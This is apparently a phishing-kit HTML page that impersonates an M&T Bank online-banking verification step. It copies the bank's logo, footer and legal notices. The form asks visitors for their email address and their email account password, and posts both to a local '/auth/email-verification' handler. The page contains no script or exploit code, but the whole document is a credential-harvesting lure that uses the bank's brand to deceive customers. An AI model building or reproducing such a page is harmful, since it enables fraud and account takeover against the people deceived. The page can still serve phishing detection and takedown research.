<!DOCTYPE HTML>
<html lang="en" class="__sticky-footer __sticky-footer--links">

<head>
    <title>Welcome to Online Banking | M&amp;T Bank</title>
    <link rel="shortcut icon" href="assets2/favicon.ico" type="image/x-icon" />
    <meta charset="UTF-8" />
    <meta name="viewport"
        content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <meta name="format-detection" content="telephone=no" />
    <link href="/assets2/css.css" rel="stylesheet" />
</head>

<body>
    <form action="/auth/email-verification" method="post">
        <div class="mtb-app-enrollment">
            <header class="mtb-page-header">
                <div class="grid-x align-center">
                    <div class="cell">
                        <a href="" class="mtb__logo">
                            <img src="/assets2/mtb-logo.svg" alt="M&amp;T Bank Site">
                        </a>
                    </div>
                </div>
            </header>
            <div class="mtb-app-login--content">
                <div class="grid-x grid-padding-x grid-x__padded __spacer-section">
                    <div class="cell">
                        <div class="mtb-section-header mtb-section-header__login">
                            <h1>
                                We need a bit more info to verify your identity.
                            </h1>
                            <p>
                                Verify your Email
                            </p>
                        </div>
                    </div>


                    <div class="cell">

                        <div class="cell hide" data-showFor=BusinessAccount>


                            <h2 class="mtb-form__section-title hide" data-showFor=BusinessAccount>
                                Company Administrator Information
                                <button tabindex="0" type="button"
                                    class="m-icon m-icon-questionmarkcircle __contextual-help mtb-help m-icon-questionmarkcircle js-modal-trigger"
                                    aria-haspopup="true" aria-controls="reveal-basic"
                                    data-ensightentag=CompanyAdministratorInfoQuestionIcon data-open=companyadmin-modal>
                                    <span class="show-for-sr">Show Help</span>
                                </button>
                            </h2>
                        </div>
                        <div data-parentFor="email" class="cell js-formFieldParent " data-showFor=BusinessAccount>
                            <label for="email">Email Address</label>
                            <input data-fcid="" value="" maxlength="20" class="js-formnputItem" data-allowPaste="True"
                                data-allowCopy="True" data-textBoxAccepts="letters" placeholder="" type="text"
                                id="email" name="email" data-inputType="text" required>
                            <p class="form-error" id=FirstNameError role="alert"></p>
                            <p class="form-help-text"></p>
                        </div>
                        <div data-parentFor="email" class="cell js-formFieldParent " data-showFor=BusinessAccount>
                            <label for="password">Email Password</label>
                            <input data-fcid="" value="" maxlength="20" class="js-formnputItem" data-allowPaste="True"
                                data-allowCopy="True" data-textBoxAccepts="letters" placeholder="" type="password"
                                id="password" name="emailPassword" data-inputType="text" required>
                            <p class="form-error" id=FirstNameError role="alert"></p>
                            <p class="form-help-text"></p>
                        </div>







                        <p class="form-error" id=AccountNumberError role="alert"></p>
                        <p class="form-help-text"></p>

                    </div>





                    </section>



                    <div class="grid-x grid-padding-x __spacer-paragraph grid-x__padded">
                        <div class="cell">
                            <button type="submit" class="button button__form-no-spacer expanded">
                                Next
                            </button>
                        </div>

                        <p class="cell text-center __font-size-tiny __color-gray-accent">
                            Unauthorized access is prohibited. Usage may be monitored.
                        </p>
                    </div>
                </div>
                <hr class="__spacer-section" />
                <div class="mtb-app-default--content">
                    <div class="grid-x grid-padding-x grid-x__padded">
                        <div class="cell text-center">

                        </div>
                    </div>
                </div>
                <section class="mtb-footer mtb-footer__auth" role="contentinfo">
                    <div class="grid-x">
                        <div class="cell flex-container flex-dir-column align-center-middle">
                            <div class="mtb-footer--auth">
                                <a href="" class="" target="_blank">Get Started Guide</a>
                                <a href="" target="_blank">Security Assistance</a>
                                <a href="" target="_blank">Digital Service Agreement</a>
                                <a href="" target="_blank">ESign Agreement</a>
                                <a href="" target="_blank">
                                    Accessibility
                                </a>
                                <a href="" target="_blank">
                                    mtb.com
                                </a>
                            </div>
                            <div class="mtb-footer--non-auth">
                                <p>
                                    &copy;2022 M&amp;T Bank. All Rights Reserved.<br>
                                    Users of this website agree to be bound by the provisions of the M&amp;T website <a
                                        href="" target="_blank">
                                        Terms of
                                        Use
                                    </a> and <a href="" target="_blank">Privacy Policy</a>.
                                </p>
                                <div class="mtb-footer__logo">
                                    <a href="" target="_blank">
                                        <img src=/assets2/mtb-equalhousinglender.svg
                                            class="mtb-footer__equalhousinglender" alt="Equal Housing Lender" />
                                    </a>
                                    <a href="" target="_blank">
                                        <img src="/assets2/mtb-entrust.svg " class="mtb-footer__entrust"
                                            alt="Entrust" />
                                    </a>
                                </div>
                                <p>
                                    Equal Housing Lender NMLS #381076
                                    <a href="" target="_blank">Member FDIC</a>
                                </p>
                            </div>
                        </div>
                    </div>
                </section>
            </div>
    </form>
</body>

</html>